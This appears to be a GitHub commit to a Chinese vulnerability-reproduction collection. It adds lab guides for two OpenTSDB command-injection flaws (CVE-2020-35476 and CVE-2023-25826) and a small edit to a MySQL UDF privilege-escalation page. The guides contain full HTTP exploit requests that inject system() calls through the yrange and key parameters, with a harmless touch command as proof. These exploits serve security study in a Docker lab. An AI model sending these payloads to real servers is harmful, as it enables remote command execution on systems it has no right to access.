Skip to content

Commit

Permalink
update opentsdb cve-2020-35476 & cve-2023-25826
Browse files Browse the repository at this point in the history
  • Loading branch information
@Threekiii
Threekiii committed Mar 7, 2024
1 parent 7ad4a15 commit 263d632
Show file tree
Hide file tree
Showing 19 changed files with 196 additions and 3 deletions.
5 changes: 3 additions & 2 deletions docs-base/docs/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,9 @@

**【最近更新】**

- 2024.03.07
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-21351.md
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-29505.md
- 2024.02.26
- Vulhub/Adobe-ColdFusion-XML-反序列化命令执行漏洞-CVE-2023-29300.md
- Vulhub/Adobe-ColdFusion-本地文件包含漏洞-CVE-2023-26360.md
Expand All @@ -20,8 +23,6 @@
- Vulhub/Jenkins-CLI-接口任意文件读取漏洞-CVE-2024-23897.md
- Vulhub/Jetbrains-TeamCity-认证绕过导致远程命令执行漏洞-CVE-2023-42793.md
- Vulhub/MeterSphere-v1.15.4-认证用户SQL注入漏洞-CVE-2021-45788.md


- 2024.01.31
- OA漏洞/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md
- 开发框架漏洞/Apache-Commons-Configuration-远程命令执行漏洞-CVE-2022-33980.md
Expand Down
2 changes: 2 additions & 0 deletions docs-base/docs/_sidebar.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -157,6 +157,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
Expand Down
7 changes: 6 additions & 1 deletion docs-base/docs/appserver/MySQL-UDF提权.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,12 @@ UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数

## 漏洞复现

查看 secure_file_priv:

```
show variables like "secure_file_priv";
```

寻找插件目录,将 UDF 的动态链接库文件放到 MySQL 的插件目录:

```
Expand Down Expand Up @@ -80,4 +86,3 @@ Query OK, 0 rows affected (0.00 sec)
mysql> select * from func;
Empty set (0.00 sec)
```

77 changes: 77 additions & 0 deletions docs-base/docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
# OpenTSDB 命令注入漏洞 CVE-2020-35476

## 漏洞描述

OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。

参考链接:

- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051)
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)

## 环境搭建

Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0:

```
docker compose up -d
```

服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png)

## 漏洞复现

利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png)

这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:

```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png)

如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。再次查看 metric 列表,metric 已经创建完成:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png)

发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric:

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png)

进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png)
104 changes: 104 additions & 0 deletions docs-base/docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,104 @@
# OpenTSDB 命令注入漏洞 CVE-2023-25826

## 漏洞描述

OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。

参考链接:

- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/)
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)

## 环境搭建

Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1:

```
docker-compose up -d
```

服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png)

## 漏洞复现

这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。

这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:

```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 972388800,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png)

如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。

发送 CVE-2020-35476 payload :

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

将返回错误:

```
{"err":"'yrange' was invalid. Must be in the format [min:max]."}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png)

CVE-2023-25826 绕过修复的一个点,在参数 key 这里:

```shell
# CVE-2020-35476
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

# CVE-2023-25826
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
```

发送数据包:

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png)

进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png)
2 changes: 2 additions & 0 deletions docs-base/docs/vulhub/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -158,6 +158,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
Expand Down
2 changes: 2 additions & 0 deletions docs-base/docs/vulhub/_sidebar.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -157,6 +157,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
Expand Down
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165806970.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165830409.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165935912.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170059167.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170532492.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170625205.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171841166.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171931111.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172057803.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172116456.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172238155.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172321376.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit 263d632

Please sign in to comment.